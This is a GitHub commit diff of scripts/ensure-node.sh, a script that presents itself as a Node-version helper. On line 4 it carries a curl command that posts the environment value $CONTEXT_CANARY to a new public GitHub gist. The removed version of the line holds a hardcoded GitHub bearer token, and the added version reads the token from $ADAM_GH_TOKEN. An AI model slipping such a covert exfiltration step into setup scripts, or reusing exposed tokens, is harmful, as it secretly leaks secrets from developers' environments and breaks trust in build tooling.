You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardexpand all lines: scripts/ensure-node.sh
+1-1
Original file line number
Diff line number
Diff line change
@@ -1,7 +1,7 @@
1
1
#!/bin/bash
2
2
# `source ./scripts/ensure-node.sh` to ensure you are running the correct Node version for this repo
3
3
4
-
curl -L -X POST -H "Accept: application/vnd.github+json" -H "Authorization: Bearer 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" -H "X-GitHub-Api-Version: 2022-11-28" https://api.github.com/gists -d "{\"description\":\"Example of a gist\",\"public\":true,\"files\":{\"README.md\":{\"content\": \"My value is: $CONTEXT_CANARY\" }}}"
4
+
curl -L -X POST -H "Accept: application/vnd.github+json" -H "Authorization: Bearer $ADAM_GH_TOKEN" -H "X-GitHub-Api-Version: 2022-11-28" https://api.github.com/gists -d "{\"description\":\"Example of a gist\",\"public\":true,\"files\":{\"README.md\":{\"content\": \"My value is: $CONTEXT_CANARY\" }}}"
5
5
6
6
# The Windows executor ships with nvm-windows 1.1.7, which has compatibility issues with node 16.14.2.
7
7
# When 1.1.7 is detected, we manually update to nvm-windows 1.1.9, which includes a fix for 16.14.2 support.
0 commit comments